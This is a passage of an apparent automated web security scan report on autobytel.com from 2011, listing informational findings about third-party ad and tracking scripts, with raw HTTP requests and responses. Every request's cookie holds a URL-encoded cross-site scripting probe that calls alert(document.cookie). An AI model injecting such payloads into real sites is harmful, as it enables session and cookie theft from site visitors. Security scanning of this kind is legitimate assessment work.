<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.535. http://www.autobytel.com/content/home/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=13148;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=597x90;ord=26445606?
  • http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=13148;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=369x78;!cat=;ord=26445606?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/home/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70719


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
8;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=369x78;!cat=;ord=26445606?" name="frame1" width="369" height="78" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" border="0">
   <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=13148;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=369x78;!cat=;ord=26445606?">
   </script>
...[SNIP]...
13148;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=586x90;ord=26445606?" name="frame1" width="586" height="93" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
       <script language="Javascript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=13148;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=597x90;ord=26445606?">
       </script>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.536. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=728x90;ptile=1;!cat=;ord=18074096?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=160x600;ptile=2;!cat=;ord=18074096?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=1x3;!cat=;ord=18074096?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:27:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:13 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75062


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
21496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=728x90;ptile=1;!cat=;ord=18074096?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=728x90;ptile=1;!cat=;ord=18074096?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=1x3;!cat=;ord=18074096?"></script>
...[SNIP]...
496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=160x600;ptile=2;!cat=;ord=18074096?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=160x600;ptile=2;!cat=;ord=18074096?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.537. http://www.autobytel.com/content/research/article/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=728x90;ptile=1;!cat=;ord=92160000?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=160x600;ptile=2;!cat=;ord=92160000?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=1x3;!cat=;ord=92160000?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:39 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
67972-B019-F977-06DCEC36CE17C543|||13148|||;sz=728x90;ptile=1;!cat=;ord=92160000?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=728x90;ptile=1;!cat=;ord=92160000?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=1x3;!cat=;ord=92160000?"></script>
...[SNIP]...
972-B019-F977-06DCEC36CE17C543|||13148|||;sz=160x600;ptile=2;!cat=;ord=92160000?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=160x600;ptile=2;!cat=;ord=92160000?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.538. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=728x90;ptile=1;!cat=;ord=58503224?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=160x600;ptile=2;!cat=;ord=58503224?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=1x3;!cat=;ord=58503224?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:07 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:07 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53059


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
14C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=728x90;ptile=1;!cat=;ord=58503224?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=728x90;ptile=1;!cat=;ord=58503224?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=1x3;!cat=;ord=58503224?"></script>
...[SNIP]...
C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=160x600;ptile=2;!cat=;ord=58503224?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=160x600;ptile=2;!cat=;ord=58503224?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.539. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=728x90;ptile=1;!cat=;ord=72325266?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=160x600;ptile=2;!cat=;ord=72325266?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=1x3;!cat=;ord=72325266?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45588


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
09226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=728x90;ptile=1;!cat=;ord=72325266?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=728x90;ptile=1;!cat=;ord=72325266?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=1x3;!cat=;ord=72325266?"></script>
...[SNIP]...
226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=160x600;ptile=2;!cat=;ord=72325266?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=160x600;ptile=2;!cat=;ord=72325266?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.540. http://www.autobytel.com/content/research/comparison/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/comparison/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=728x90;ptile=1;!cat=;ord=71612973?
  • http://ad.doubleclick.net/adj/abtl.research/Crossover/Wagons;abr=!ie;kw=;info=13148;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=160x600;ptile=3;!cat=;ord=71612973?
  • http://ad.doubleclick.net/adj/abtl.research/Crossover/Wagons;kw=;info=13148;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=1x3;!cat=;ord=71612973?
  • http://ad.doubleclick.net/adj/abtl.research/all;abr=!ie;kw=;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=300x250;ptile=2;!cat=;ord=71612973?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:24:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:27 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414136


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=728x90;ptile=1;!cat=;ord=71612973?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=728x90;ptile=1;!cat=;ord=71612973?"></SCRIPT>
...[SNIP]...
8-A84F-E014-C6E7898E452EB837|||13148|||;sz=300x250;ptile=2;!cat=;ord=71612973?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/all;abr=!ie;kw=;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=300x250;ptile=2;!cat=;ord=71612973?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/Crossover/Wagons;kw=;info=13148;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=1x3;!cat=;ord=71612973?"></script>
...[SNIP]...
EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=160x600;ptile=3;!cat=;ord=71612973?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/Crossover/Wagons;abr=!ie;kw=;info=13148;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=160x600;ptile=3;!cat=;ord=71612973?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
